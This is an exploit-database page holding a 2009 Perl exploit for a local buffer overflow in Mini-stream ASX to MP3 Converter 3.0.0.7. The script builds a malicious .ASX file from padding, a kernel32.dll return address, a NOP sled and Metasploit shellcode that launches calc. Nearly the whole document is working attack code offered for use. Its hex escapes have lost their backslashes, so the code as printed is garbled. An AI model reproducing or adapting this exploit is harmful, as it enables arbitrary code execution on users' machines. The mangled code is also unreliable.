Mini-stream ASX to MP3 Converter 3.0.0.7 (.ASX HREF) Local BOF Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mini-stream ASX to MP3 Converter 3.0.0.7 (.ASX HREF) Local BOF Exploit
# Published : 2009-05-07
# Author : G4N0K
# Previous Title : Mini-stream ASX to MP3 Converter 3.0.0.7 (.RAM) Buffer Overflow Exploit
# Next Title : Mini-stream Ripper 3.0.1.1 (.RAM) Local Buffer Overflow Exploit

#!/usr/bin/perl
=gnk
==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             
==============================================================================
                      ____   _  _     _   _    ___    _  __
                     / ___| | || |   |  | |  / _   | |/ /
                    | |  _  | || |_  |  | | | | | | | ' / 
                    | |_| | |__   _| | |  | | |_| | | .  
                     ____|    |_|   |_| _|  ___/  |_|_...From Iran

==============================================================================
	Mini-stream ASX to MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit
==============================================================================
	[??] Script:.............[ Mini-stream ASX to MP3 Converter 3.0.0.7 ]....
	[??] Website:............[ http://mini-stream.net/ ].....................
	[??] Today:..............[ 07052009 ]....................................
	[??] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
==============================================================================

	[x] tested on Windows XP SP2...
	[x] if you are not able to make this shit work, just put it in the Base/Root
	    of a Drive/Partition, like "C:gnk.asx"...

=cut

my $MSD = "G" x 26110;
my $SMN = "x90" x 16;
my $RA = "x5Dx38x82x7C"; # Kernel32.dll

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $Shcode = "x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x08".
             "x99x23x82x83xebxfcxe2xf4xf4x71x67x82x08x99xa8xc7".
             "x34x12x5fx87x70x98xccx09x47x81xa8xddx28x98xc8xcb".
             "x83xadxa8x83xe6xa8xe3x1bxa4x1dxe3xf6x0fx58xe9x8f".
             "x09x5bxc8x76x33xcdx07x86x7dx7cxa8xddx2cx98xc8xe4".
             "x83x95x68x09x57x85x22x69x83x85xa8x83xe3x10x7fxa6".
             "x0cx5ax12x42x6cx12x63xb2x8dx59x5bx8ex83xd9x2fx09".
             "x78x85x8ex09x60x91xc8x8bx83x19x93x82x08x99xa8xea".
             "x34xc6x12x74x68xcfxaax7ax8bx59x58xd2x60x69xa9x86".
             "x57xf1xbbx7cx82x97x74x7dxefxfax42xeex6bx99x23x82";

my $ASX = 
"<asx version="3.0">
  <title>Title is not important.</title>
  <entry>
    <title>Example...</title>
    <ref href="".$MSD.$RA.$SMN.$Shcode."" />
    <author>G4N0K</author>
    <copyright>??2009 G4N0K</copyright>
  </entry>
</asx>";

  open(ASX,'>>gnk.asx');
  print ASX $ASX;
  close(ASX);

# www.Syue.com [2009-05-07]